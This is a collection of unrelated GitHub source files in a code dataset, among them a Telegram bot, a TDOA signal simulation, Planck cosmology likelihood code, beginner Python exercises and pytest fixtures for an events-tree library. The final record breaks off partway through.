\n\n if now.hour >= first.hour:\n update.message.reply_text('Not implemented yet, problems with timezones, start_hour must be later')\n return\n \n #the magic numbers are because I am eluding the time zone problem for now\n context.job_queue.run_repeating(top_set, context=context, interval = 60*interval,\n first=(3600*(first.hour-now.hour)-60*(now.minute)),\n last=(3600*(last.hour-now.hour)-60*(now.minute)),\n )\n\n text = 'Timer successfully set! from {start} to {finish} every {mins} minutes'.format(start=start, finish=start, mins=interval)\n if job_removed:\n text += ' Old one was removed.'\n update.message.reply_text(text)\n\ndef start(update, context):\n update.message.reply_text('Hi!')\n\ndef unset(update: Update,context: CallbackContext) -> None:\n \"\"\"Remove the job if the user changed their mind.\"\"\"\n job_removed = remove_job_if_exists(update, context)\n text = 'Timer successfully cancelled!' if job_removed else 'You have no active timer'\n update.message.reply_text(text)\n\ndef help(update, context):\n \"\"\"Send a message when the command /help is issued.\"\"\"\n update.message.reply_text('/start, /top, /set_timer, /unset')\n update.message.reply_text('For example: /top 15 SatoshiStreetBets')\n update.message.reply_text(\"\"\"Or /set_timer 30 9 22 10 CryptoCurrency \n for getting every 30 minutes from 9 to 22 top_10 from CryptoCurrency\"\"\")\n\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\n\nclass Fomal_telegram():\n def __init__(self, local=False):\n self.telegram_token = Config.telegram_token\n self.port = Config.port\n self.is_local = local\n\n def connect_telegram(self):\n updater = Updater(self.telegram_token, use_context=True)\n port = os.getenv('PORT', self.port)\n # Get the dispatcher to register handlers\n dp = updater.dispatcher\n # on different commands - answer in Telegram\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"top\", top_one))\n dp.add_handler(CommandHandler(\"set_timer\", set_timer, pass_job_queue=True))\n dp.add_handler(CommandHandler(\"unset\", unset))\n dp.add_handler(CommandHandler(\"help\", help))\n\n # log all errors\n dp.add_error_handler(error)\n if self.is_local:\n # Start bot for local usasage\n updater.start_polling()\n else:\n # Start the Bot\n updater.start_webhook(listen=\"0.0.0.0\",\n port=port,\n url_path=Config.heroku_token,\n webhook_url='https://fomal.herokuapp.com/' + Config.heroku_token)\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()","repo_name":"pattersonq/sentiment-analyzer","sub_path":"libs/fomal_telegram.py","file_name":"fomal_telegram.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24077960247","text":"import matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport numpy as np\nimport sympy as sy\nimport math\nfrom trilateration import Trilateration_3D\nfrom matplotlib.animation import FuncAnimation\nimport TowersAndConstants\nfrom trilateration import Trilateration_3D\nfrom matplotlib.animation import FuncAnimation\n\nfrom TowersAndConstants import *\nfrom PlotFunctions import *\n\n# Annotations, to be updated during animation\nl = rx_square_side * 3.5\nk = 5\ncur_time = ax.text(40, l - 4 * k, k, 't = 0')\ntower_text = []\nfor i in range(number_towers):\n text = ax.text(40, l - 4 * k, -i * k, 'Tower {} received at t = '.format(i))\n tower_text.append(text)\nv_vec = ax.quiver(generatedTransmitterPosition[0] + 1, generatedTransmitterPosition[1],\n generatedTransmitterPosition[2], 1, 0, 0,\n length=10, normalize=False, fc='k', ec='k')\nv_ann = ax.text3D(generatedTransmitterPosition[0] + 4, generatedTransmitterPosition[1] + 4,\n generatedTransmitterPosition[2], 'v = {} m/s'.format(v))\nreceiveTimes_simulation = np.zeros(number_towers)\nn_frames = 120 # 120\nmax_seconds = 1.1 * max(receiveTimes_generatedTransmitterPosition)\nmax_d = 4 * max(receiveTimes_generatedTransmitterPosition)\n\n\ndef init():\n \"\"\"\n Initialize the elements that won't change during the animation.\n \"\"\"\n global tower_text, init_spheres\n # Create the figure and axes, set up your static elements\n plot_towers() # Plot towers only once\n plot_lines() # Plot lines only once\n\n\ninit_spheres = Spheres(radius=1, x=generatedTransmitterPosition[0],\n y=generatedTransmitterPosition[1],\n z=generatedTransmitterPosition[2])\ninit_spheres.coordinates()\n\n\ndef TDOAAnimation(i):\n \"\"\"\n get the receive times at each tower\n \"\"\"\n global t_rec, receiveTimes_simulation, tower_text, v_vec, v_ann\n t = i / n_frames * max_seconds\n Radius = v * t\n # ax.collections.clear()\n v_vec.remove()\n Spheres.remove_all()\n v_vec = ax.quiver(generatedTransmitterPosition[0] + Radius, generatedTransmitterPosition[1],\n generatedTransmitterPosition[2], 1, 0, 0,\n length=10, normalize=True, fc='k', ec='k')\n v_ann.set_position((generatedTransmitterPosition[0] + 4 + Radius, generatedTransmitterPosition[1] + 4))\n spheres_generatedTransmitterPosition = Spheres(radius=Radius, x=generatedTransmitterPosition[0],\n y=generatedTransmitterPosition[1],\n z=generatedTransmitterPosition[2])\n spheres_generatedTransmitterPosition.coordinates()\n cur_time.set_text('t = {:.12E} s'.format(t))\n for u in range(number_towers):\n # print('Tower {}: t = {}, receiveTimes[{}] = {}'.format(u, t, u,\n # receiveTimes_generatedTransmitterPosition[u]))\n if t >= receiveTimes_generatedTransmitterPosition[u] and receiveTimes_simulation[u] == 0:\n receiveTimes_simulation[u] = t\n tower_text[u].set_text(\n 'Tower {} received at t = {} s'.format(u, receiveTimes_simulation[u]))\n\n\nanimation = FuncAnimation(fig, TDOAAnimation, init_func=init, frames=n_frames, interval=1, blit=False, repeat=False)\nanimation.save('C:/Users/Mem/Desktop/Studium/Vertiefungsmodul/Animationen/TDOA.gif', writer='imagemagick', fps=60)\n# animation.save('/home/mohammed/Animationen/TDOA1.gif', writer='imagemagick', fps=20)\nplt.show()\n\n# define the the index of the first Tower that got the signal, default first_tower = 0.\nfirst_tower = int(np.argmin(receiveTimes_simulation))\n\n# Time Difference Of Arrival of each Tower, Tower 0 is used as the reference Tower.\n# Time Difference Of Arrival distances between each Tower. Is calculated by multiplying each TDOA with v.\nTDOA_ij = []\nTDOA_distances_ij = []\nfor i in range(number_towers):\n for j in range(i + 1, number_towers):\n tdoa_ij = abs(receiveTimes_simulation[j] - receiveTimes_simulation[i])\n TDOA_ij.append(tdoa_ij)\n TDOA_distances_ij.append(v * tdoa_ij)\nprint(\"receiveTimes_simulation:\", receiveTimes_simulation)\nprint(\"TDOA_i0:\", TDOA_ij)\nprint(\"TDOA_distances_i0:\", TDOA_distances_ij)\n","repo_name":"Mem314/Multilateration","sub_path":"TDOASimulation.py","file_name":"TDOASimulation.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4524382528","text":"\"\"\"\r\nUse uma função built-in para obter a primeira e a última letra da lista letras, considerando a ordem alfabética.\r\n\r\nletras=['c','k','w','x','m','r','j','l','n','v']\r\nResultado esperado:\r\n\r\nPrimeiro letra: c\r\nÚltima letra: x\r\n\"\"\"\r\n\r\nletras = ['c', 'k', 'w', 'x', 'm', 'r', 'j', 'l', 'n', 'v']\r\n\r\nprint(f'Primeira letra: {min(letras)}\\n'\r\n f'Última letra: {max(letras)}')","repo_name":"hhigorb/exercicios_python_pratica","sub_path":"4_Funções/ex030.py","file_name":"ex030.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38165885682","text":"\"\"\"\nproper fraction\n\"\"\"\nfraction = (100/1000)\nprint(fraction)\n\n\"\"\"\nimproper fraction\n\"\"\"\nim_fraction = (1000/100)\nprint(im_fraction)\n\n\"\"\"\nRasel picked (X) mangoes from their trees.\nTotal (Y) members are there in his family.\nNow he will divide these mangoes among all his family members.\n\"\"\"\nX = int(input(\"How many members are there in his family: : \"))\nY = int(input(\"How many mangoes he picked: \"))\nprint(f'Form {Y} part of Mangoes every family members get {X/Y} part.')\nprint(\"This is the proper fractions.\\n\")\n\n\"\"\"\nequivalent fraction.\n\"\"\"\na = int(input(\"Enter the numerator of fractions 1: \"))\nb = int(input(\"Enter the denominator of fractions 1: \"))\nc = int(input(\"Enter the number (x) numerator 'this number must be not zero': \"))\nd = int(input(\"Enter the number (X) denominator 'this number must be not zero': \"))\neq_fraction_1 = (a/b)\neq_fraction_2 = ((a*c)/(b*d))\nif (eq_fraction_1 == eq_fraction_2):\n print(\"This is a equivalent fractions.\")\nelse:\n print(\"This is not a equivalent fractions.\")\n\n\n\n","repo_name":"sushen/mathandmoremath","sub_path":"3. Fractions/fractions.py","file_name":"fractions.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18742549689","text":"import os\nimport numpy as np\n\nfrom desilike.likelihoods import BaseGaussianLikelihood\nfrom desilike.jax import numpy as jnp\nfrom desilike import utils\n\n\nconvert_planck2018_params = {'omegabh2': 'omega_b', 'omegach2': 'omega_cdm', 'omegak': 'Omega_k', 'w': 'w0_fld', 'wa': 'wa_fld', 'theta': 'theta_MC_100', 'tau': 'tau_reio', 'mnu': 'm_ncdm', 'logA': 'logA', 'ns': 'n_s', 'nrun': 'alpha_s', 'r': 'r', 'H0': 'H0', 'omegam': 'Omega_m', 'omegal': 'Omega_Lambda', 'omegam': 'Omega_m', 'rdrag': 'rs_drag', 'zdrag': 'z_drag'}\n\nconvert_planck2018_params.update({'calPlanck': 'A_planck', 'cal0': 'calib_100T', 'cal2': 'calib_217T', 'acib217': 'A_cib_217', 'xi': 'xi_sz_cib',\n 'asz143': 'A_sz', 'aksz': 'ksz_norm',\n 'kgal100': 'gal545_A_100', 'kgal143': 'gal545_A_143', 'kgal217': 'gal545_A_217', 'kgal143217': 'gal545_A_143_217',\n 'galfTE100': 'galf_TE_A_100', 'galfTE100143': 'galf_TE_A_100_143', 'galfTE100217': 'galf_TE_A_100_217',\n 'galfTE143': 'galf_TE_A_143', 'galfTE143217': 'galf_TE_A_143_217', 'galfTE217': 'galf_TE_A_217',\n 'aps100': 'ps_A_100_100', 'aps143': 'ps_A_143_143', 'aps143217': 'ps_A_143_217', 'aps217': 'ps_A_217_217'})\n\n\ndef planck2018_base_fn(basename, data_dir=None):\n \"\"\"\n Return paths to chains and corresponding summary statistics given input base chain name,\n and data directory ``data_dir``. If ``data_dir`` is ``None``, defaults to path saved in desilike's configuration,\n as provided by :class:`Installer` if :class:`BasePlanck2018GaussianLikelihood` or :class:`FullGridPlanck2018GaussianLikelihood` have been installed.\n \"\"\"\n if data_dir is None:\n installer_section = 'FullGridPlanck2018GaussianLikelihood'\n from desilike.install import Installer\n try:\n data_dir = Installer()[installer_section]['data_dir']\n except KeyError:\n if basename.startswith('base_plik'):\n installer_section = 'BasePlanck2018GaussianLikelihood'\n data_dir = Installer()[installer_section]['data_dir']\n else:\n raise\n try:\n base_dir, obs_dir = basename.split('_plikHM_')\n except ValueError as exc:\n raise ValueError('basename {0} is expected to contain \"_plikHM_\"; maybe you forgot to add the model name in front, e.g. base_{0}?'.format(basename)) from exc\n base_chain_fn = os.path.join(data_dir, base_dir, 'plikHM_' + obs_dir, basename)\n base_dist_fn = os.path.join(data_dir, base_dir, 'plikHM_' + obs_dir, 'dist', basename)\n return base_chain_fn, base_dist_fn\n\n\ndef read_planck2018_chain(basename='base_plikHM_TTTEEE_lowl_lowE_lensing', data_dir=None, weights=None, params=None):\n \"\"\"\n Read Planck chains, operating basic conversion in parameters.\n\n Parameters\n ----------\n basename : str, default='base_plikHM_TTTEEE_lowl_lowE_lensing'\n Likelihood base name, e.g. 'base_plikHM_TT', 'base_plikHM_TTTEEE', 'base_plikHM_TTTEEE_lowl_lowE_lensing'.\n\n data_dir : str, Path, default=None\n Data directory. Defaults to path saved in desilike's configuration,\n as provided by :class:`Installer` if :class:`BasePlanck2018GaussianLikelihood` or :class:`FullGridPlanck2018GaussianLikelihood` have been installed.\n\n weights : str, callable, default=None\n Callable that takes a :class:`Chain` as input and returns weights (float),\n e.g. ``weights = lambda chain: 1. / np.exp(chain['logposterior'] + 0.5 * chain['chi2_prior'] + 0.5 * chain['chi2_CMB'])``.\n If ``weights`` is 'cmb_only', the lambda function above is used to \"importance unweight\" the non-CMB datasets\n (useful e.g. to get an approximation of the CMB-only posterior for :math:`w_{0}` and :math:`w_{a}` extensions).\n\n params : list, ParameterCollection\n List of parameters to convert the chain to; e.g. ['h', 'Omega_m', 'A_s'].\n\n Returns\n -------\n chain : Chain\n \"\"\"\n from desilike.samples import Chain\n base_chain_fn = planck2018_base_fn(basename, data_dir=data_dir)[0]\n chain = Chain.concatenate(Chain.read_getdist(base_chain_fn))\n\n if weights is not None:\n if isinstance(weights, str):\n\n if weights.lower() == 'cmb_only':\n\n def weights(chain):\n loglikelihood_non_cmb = chain['logposterior'] + 0.5 * chain['chi2_prior'] + 0.5 * chain['chi2_CMB']\n loglikelihood_non_cmb -= np.mean(loglikelihood_non_cmb) # remove zero-lag\n return 1. / np.exp(loglikelihood_non_cmb)\n\n elif not callable(weights):\n raise ValueError('weights should be a callable, found {}'.format(weights))\n\n chain.aweight *= weights(chain)\n\n if params is not None:\n\n for name, newname in convert_planck2018_params.items():\n if name in chain:\n chain[newname] = chain[name]\n\n def get_from_chain(name):\n if name in chain:\n return chain[name]\n if name == 'A_s':\n return 1e-10 * np.exp(get_from_chain('logA'))\n if name in ['ln10^{10}A_s', 'ln10^10A_s', 'ln_A_s_1e10']:\n return get_from_chain('logA')\n if name == 'h':\n return get_from_chain('H0') / 100.\n if name.startswith('omega'):\n return get_from_chain('O' + name[1:]) * get_from_chain('h') ** 2\n if name in ['Omega_b', 'Omega_cdm']:\n return get_from_chain('o' + name[1:]) / get_from_chain('h') ** 2\n\n missing = []\n for param in params:\n name = str(param)\n array = get_from_chain(name)\n if array is None: missing.append(name)\n else: chain[param] = array\n if missing:\n raise ValueError('cannot find parameters {} from chain'.format(missing))\n\n # In case we needed more parameters, we could run desilike's Cosmoprimo in parallel\n return chain\n\n\nclass BasePlanck2018GaussianLikelihood(BaseGaussianLikelihood):\n r\"\"\"\n Gaussian approximation of \"base\" likelihoods of Planck's 2018 data release.\n\n Reference\n ---------\n https://arxiv.org/abs/1807.06209\n\n https://wiki.cosmos.esa.int/planck-legacy-archive/index.php/CMB_spectrum_%26_Likelihood_Code\n\n Parameters\n ----------\n cosmo : BasePrimordialCosmology, default=None\n Cosmology calculator. Defaults to ``Cosmoprimo()``.\n\n data_dir : str, Path, default=None\n Data directory. Defaults to path saved in desilike's configuration,\n as provided by :class:`Installer` if likelihood has been installed.\n\n basename : str, default='base_plikHM_TTTEEE_lowl_lowE_lensing'\n Likelihood base name, e.g. 'base_plikHM_TT', 'base_plikHM_TTTEEE', 'base_plikHM_TTTEEE_lowl_lowE_lensing'.\n\n source : str, default=None\n Source, either:\n\n - 'covmat': use '.margestats' for mean and '.covmat' file as covariance.\n - 'chains': compute mean and covariance from chains\n\n Both options are very close (within precision in provided file).\n Defaults to 'chains' if ``weights`` is not ``None``, else 'covmat'.\n\n weights : str, callable, default=None\n Callable that takes a :class:`Chain` as input and returns weights (float),\n e.g. ``weights = lambda chain: 1. / np.exp(chain['logposterior'] + 0.5 * chain['chi2_prior'] + 0.5 * chain['chi2_CMB'])``.\n If ``weights`` is 'cmb_only', the lambda function above is used to \"importance unweight\" the non-CMB datasets\n (useful e.g. to get an approximation of the CMB-only posterior for :math:`w_{0}` and :math:`w_{a}` extensions).\n Only available if ``source`` is 'chains'.\n \"\"\"\n config_fn = 'planck2018_gaussian.yaml'\n installer_section = 'BasePlanck2018GaussianLikelihood'\n data_file_id = 'COM_CosmoParams_base-plikHM_R3.01.zip'\n\n def initialize(self, cosmo=None, data_dir=None, basename='base_plikHM_TTTEEE_lowl_lowE_lensing', source=None, weights=None):\n self.name = basename\n self.base_chain_fn, self.base_dist_fn = planck2018_base_fn(basename, data_dir=data_dir)\n if cosmo is None:\n from desilike.theories.primordial_cosmology import Cosmoprimo\n cosmo = Cosmoprimo()\n self.cosmo = cosmo\n basenames = ['omegabh2', 'omegach2', 'omegak', 'w', 'wa', 'theta', 'tau', 'mnu', 'logA', 'ns', 'nrun', 'r']\n if source is None:\n source = 'covmat' if weights is None else 'chains'\n if source == 'covmat':\n if weights: raise ValueError('use source = \"chains\" to reweight chains')\n from desilike import LikelihoodFisher\n self.fisher = LikelihoodFisher.read_getdist(self.base_dist_fn, basename=basenames)\n elif source == 'chains':\n chain = read_planck2018_chain(basename=basename, data_dir=data_dir, weights=weights)\n self.fisher = chain.select(basename=basenames).to_fisher()\n else:\n raise ValueError('source must be one of [\"covmat\", \"chains\"]')\n for param in self.fisher.params(): param.update(name=convert_planck2018_params[param.name])\n params = self.fisher.params()\n self.cosmo_quantities = params.basenames()\n super(BasePlanck2018GaussianLikelihood, self).initialize(data=self.fisher.mean(params=params), covariance=self.fisher.covariance(params=params))\n\n @property\n def flattheory(self):\n return jnp.array([self.cosmo[param] for param in self.cosmo_quantities])\n\n @classmethod\n def install(cls, installer):\n try:\n data_dir = installer[cls.installer_section]['data_dir']\n except KeyError:\n data_dir = installer.data_dir(cls.installer_section)\n\n from desilike.install import exists_path, download, extract\n\n if installer.force_reinstall or not exists_path(os.path.join(data_dir, 'base')):\n # Install data\n tar_base, size = cls.data_file_id, None\n if utils.is_sequence(tar_base):\n tar_base, size = cls.data_file_id\n url = 'http://pla.esac.esa.int/pla/aio/product-action?COSMOLOGY.FILE_ID={}'.format(tar_base)\n tar_fn = os.path.join(data_dir, tar_base)\n download(url, tar_fn, size=size)\n extract(tar_fn, data_dir)\n installer.write({cls.installer_section: {'data_dir': data_dir}})\n\n\nclass FullGridPlanck2018GaussianLikelihood(BasePlanck2018GaussianLikelihood):\n r\"\"\"\n Gaussian approximation of the full grid of likelihoods of Planck's 2018 data release.\n\n Reference\n ---------\n https://arxiv.org/abs/1807.06209\n\n https://wiki.cosmos.esa.int/planck-legacy-archive/index.php/CMB_spectrum_%26_Likelihood_Code\n\n Parameters\n ----------\n cosmo : BasePrimordialCosmology, default=None\n Cosmology calculator. Defaults to ``Cosmoprimo()``.\n\n data_dir : str, Path, default=None\n Data directory. Defaults to path saved in desilike's configuration,\n as provided by :class:`Installer` if likelihood has been installed.\n\n basename : str, default='base_plikHM_TTTEEE_lowl_lowE_lensing'\n Likelihood base name, e.g. 'base_plikHM_TT', 'base_plikHM_TTTEEE', 'base_plikHM_TTTEEE_lowl_lowE_lensing', 'base_mnu_plikHM_TTTEEE_lowl_lowE_lensing'.\n\n source : str, default='covmat'\n Source, either:\n\n - 'covmat': use '.margestats' for mean and '.covmat' file as covariance.\n - 'chains': compute mean and covariance from chains\n\n Both options are very close (within precision in provided file).\n \"\"\"\n config_fn = 'planck2018_gaussian.yaml'\n installer_section = 'FullGridPlanck2018GaussianLikelihood'\n data_file_id = ('COM_CosmoParams_fullGrid_R3.01.zip', 11e9)\n","repo_name":"cosmodesi/desilike","sub_path":"desilike/likelihoods/cmb/planck2018_gaussian.py","file_name":"planck2018_gaussian.py","file_ext":"py","file_size_in_byte":11787,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"42262236571","text":"import json\nimport numpy\nfrom numpy import *\nimport scipy.stats, scipy\nimport pymultinest\nfrom Full_likelihood import *\n\n\ndef Prior(cube, ndim, nparams): \n\n\t#Spectral index. Uniform prior between 2 and 3. \n\tcube[0] = cube[0] + 2\n\n\t#Mass of mediator. Log uniform prior between 10^-5 and 10^2\n\tcube[1] = 10**(cube[1]*7 - 5)\n\n\t#Coupling constant. Log uniform prior between 10^-3 and 1. \n\tcube[2] = 10**(cube[2]*3 -3)\n\n\t#Expected number of astrophysical neutrinos. Uniform distribution between 0 and 80.\n\tcube[3] = cube[3] * 80 \n\n\t#Expected number of conv. atm. neutrinos. Uniform distribution between 0 and 80.\n\tcube[4] = cube[4] * 80 \n\n\t#Expected number of prompt atm. neutrinos. Uniform distribution between 0 and 80.\n\tcube[5] = cube[5] * 80 \n\n\t#Expected number of atm. muons. Uniform distribution between 0 and 80.\n\tcube[6] = cube[6] * 80 \n\n\treturn 0\n\n\ndef Log_Like(cube, ndim, nparams): \n\n\tgamma = cube[0]\n\tM = cube[1]\n\tg = cube[2]\n\tN_a = cube[3]\n\tN_conv = cube[4]\n\tN_pr = cube[5]\n\tN_mu = cube[6]\n\n\tz_min = 0\n\tz_max = 4\n\tE_min = 3\n\tE_max = 8\n\tE_npts = 5 #200\n\n\tlog10_nu_energy_min = 2.8\n\tlog10_nu_energy_max = 9.2\n\n\tnu_energy_min = 10**log10_nu_energy_min\n\tnu_energy_max = 10**log10_nu_energy_max\n\tnu_energy_num_nodes = 20 #150\n\tcosthz_npts = 2 #50\n\tlog10_energy_dep_int_min = 4\n\tlog10_energy_dep_int_max = 7\n\tlog10_energy_dep_min = 3.8\n\tlog10_energy_dep_max = 7.2\n\tlog10_energy_dep_npts = 10 #50\n\ttime_det_yr = 8\n\tvolume_total = 6.44e14\n\tenergy_nu_max = 1e8\n\tepsabs = 1e-3\n\tepsrel = 1e-3\n\tverbose = 1\n\n\tlikelihood = Full_likelihood(N_a, N_conv, N_pr, N_mu, g, M, z_min, z_max, E_min, E_max, E_npts, gamma, nu_energy_min, nu_energy_max, nu_energy_num_nodes, \n\t\t\t\t\t\t\t\tcosthz_npts, log10_energy_dep_int_min, log10_energy_dep_int_max, log10_energy_dep_min, log10_energy_dep_max, log10_energy_dep_npts, \n \t\t\t\t\ttime_det_yr, volume_total, energy_nu_max, epsabs, epsrel, verbose)\n\n\tlog_l = np.log10(likelihood)\n\tprint('Log_l=',log_l)\n\treturn log_l\n\n\n\n\nparameters = [\"gamma\", \"M\", \"g\", \"N_a\", \"N_conv\", \"N_pr\", \"N_mu\"]\nn_params = len(parameters)\n\n\n\n\n# Run MultiNest\npymultinest.run(Log_Like, Prior, n_params, outputfiles_basename='out/',\n\t\t\t\tresume=True, verbose=True, n_live_points=100, seed=1, \n\t\t\t\tevidence_tolerance=0.1, importance_nested_sampling=True)\n\njson.dump(parameters, open('out/params.json', 'w')) # Save parameter names\n\n","repo_name":"mbustama/secret-nu-int","sub_path":"Likelihood/Likelihood_analysis.py","file_name":"Likelihood_analysis.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4939648592","text":"\"\"\"\nLargest palindrome product\n\nA palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 x 99.\n\nFind the largest palindrome made from the product of two 3-digit numbers.\n-------------------------\n\n\"\"\"\n\n# let's first create a function that checks for a given integer if it's a palindrome or not\ndef is_palindrome(number=int):\n \"\"\"\n In this function we build the given number backwards by \n taking the last number from left to right and putting it \n at the beggining and so on then compare the given number\n with the obtained result and tell if it's a palindrome or\n not.\n \"\"\"\n # at the beggining the reverse variable is empty\n reverse = 0\n # we keep a copy of the given number because it's initial\n # value will be altered during the while loop\n original_number = number\n\n # iteration process\n while number > 0:\n reverse = (reverse * 10 + number % 10) # we multiply the previous reverse value\n # by 10 too keep the previous digit then we add the most right placed digit of the\n # orginal number\n # It's a bit abstract as you see it here but by playing around with the Python\n # interpreter you will understand better the trick ;)\n number=number//10 # here we truncate the last digit from the number \n \n if reverse == original_number: # final statement\n return True\n\n# now we'll use two variables to multiply each 3 digits number by every other 3 digits numbers\n# and get the product of each operation and test if it's a palindrome or not by using our \n# function, if yes we put it in a list containing evey palindrome found.\n\npalindromes = []\n\nfor first_factor in range(100,1000):\n\n for second_factor in range(1,1000):\n\n if is_palindrome(first_factor * second_factor): # we test if each product is a palindrome\n palindromes.append(first_factor * second_factor) # if so we append it to our list\n\nlargest_palindrome = 0 # at first our biggest palindrome is 0, value will increase later\n\n# in this simple for loop we compare each palindrome to get the largest one \nfor palindrome in palindromes:\n if palindrome > largest_palindrome:\n largest_palindrome = palindrome\n\n# output the answer\nprint(largest_palindrome)\n","repo_name":"TheWritter/ProjectEuler","sub_path":"problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9553523073","text":"\"\"\"Top-level package for geemap.\"\"\"\n\n__author__ = \"\"\"Qiusheng Wu\"\"\"\n__email__ = \"giswqs@gmail.com\"\n__version__ = \"0.8.11\"\n\n\ndef in_colab_shell():\n \"\"\"Tests if the code is being executed within Google Colab.\"\"\"\n import sys\n\n if \"google.colab\" in sys.modules:\n return True\n else:\n return False\n\n\nif in_colab_shell():\n from .eefolium import *\nelse:\n from .geemap import *\n","repo_name":"konradteichert/geemap","sub_path":"geemap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"43406269362","text":"import os\nimport sys\nimport numpy as np\n\ndef read_result(i):\n\tresultat = open(\"Perf/resultat_client_\"+str(i)+\".txt\",\"r\")\n\n\tcontenu = resultat.read()\n\n\tcontenu = contenu.split(\"\\n\")\n\t\n\treturn contenu[len(contenu)-2]\n\t\n\nnb_client = int(sys.argv[1])\nresults = []\n\nfor i in range(nb_client):\n\tresults.append(read_result(i))\n\narray = np.array(results, dtype=\"int\")\n\ntotal = 0\n\nfor i in array:\n\ttotal += i\n\t\n#print(total)\n\t\nval = (total / nb_client )/60\nprint (val)\n","repo_name":"BoubacarKaneTSP/Test","sub_path":"Performance/read_results.py","file_name":"read_results.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2401173664","text":"class Solution:\n def search(self, nums: List[int], target: int) -> int:\n left, right = 0, 0 if nums[0] < nums[-1] else len(nums)-1\n \n while left < right:\n mid = left + int((right-left)/2)\n if nums[0] <= nums[mid]:\n left = mid+1\n else:\n right = mid\n \n if nums[left] <= target <= nums[-1]:\n left, right = left, len(nums)-1\n else:\n left, right = 0, max(0, left-1)\n \n while left <= right:\n mid = int((left+right)/2)\n if target == nums[mid]:\n return mid\n if target < nums[mid]:\n right = mid-1\n else:\n left = mid+1\n \n return -1\n","repo_name":"SouradeepSaha/leetcode","sub_path":"33. Search in Rotated Sorted Array.py","file_name":"33. Search in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4916670545","text":"#!/usr/bin/env python2\n\nfrom compute import *\nfrom drawer import *\n\nbk1 = Sphere(0, 0, 0, 0)\nbk2 = Sphere(0.5, 0.5, 0.5, 0)\nbk3 = Sphere(-0.6, -0.5, -0.5, 0)\nbk4 = Sphere(-0.5, 0.5, 0.5, 0)\nbk5 = Sphere(0.3, -0.7, -0.5, 0)\nbks1 = [bk1]\nbks2 = [bk1, bk2]\nbks3 = [bk1, bk2, bk3]\nbks4 = [bk1, bk2, bk3, bk4]\nbks5 = [bk1, bk2, bk3, bk4, bk5]\nblocks = [bks1, bks2, bks3, bks4, bks5]\n\nresult = compute(10, bks5)\n# for circle in result:\n# print circle.x, circle.y, circle.z, circle.r\n\nplot(result, bks3, None)","repo_name":"WqyJh/software_engineering","sub_path":"proj3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39513581059","text":"from datetime import datetime\n\nimport pytest\n\nfrom th2_data_services import Data\nfrom th2_data_services.provider.v5.commands.http import GetEvents\nfrom th2_data_services.provider.v5.data_source import HTTPProvider5DataSource\nfrom th2_data_services.provider.v5.events_tree.events_tree_collection import EventsTreeCollectionProvider5\n\n\n@pytest.mark.skip\ndef test_recover_unknown_events():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=50, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n\n before_tree = events.len\n collection = EventsTreeCollectionProvider5(events, data_source=data_source)\n after_tree = len(collection)\n\n assert not collection.detached_events and before_tree != after_tree\n\n\n@pytest.mark.skip\ndef test_recover_unknown_events_ds_passed_into_method():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=50, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n\n before_tree = events.len\n collection = EventsTreeCollectionProvider5(events)\n collection.recover_unknown_events(data_source=data_source)\n after_tree = len(collection)\n\n assert not collection.detached_events and before_tree != after_tree\n\n\n@pytest.mark.skip\ndef test_recover_unknown_events_with_stub_events():\n data_source = HTTPProvider5DataSource(\"http://10.100.66.114:31787/\")\n events: Data = data_source.command(\n GetEvents(\n start_timestamp=datetime(year=2022, month=6, day=30, hour=14, minute=50, second=0, microsecond=0),\n end_timestamp=datetime(year=2022, month=6, day=30, hour=15, minute=0, second=0, microsecond=0),\n )\n )\n\n broken_event = {\n \"attachedMessageIds\": [],\n \"batchId\": \"Broken_Event\",\n \"endTimestamp\": {\"nano\": 0, \"epochSecond\": 0},\n \"startTimestamp\": {\"nano\": 0, \"epochSecond\": 0},\n \"type\": \"event\",\n \"eventId\": f\"33499-333-111-test-03221\",\n \"eventName\": \"Broken_Event\",\n \"eventType\": \"Broken_Event\",\n \"parentEventId\": 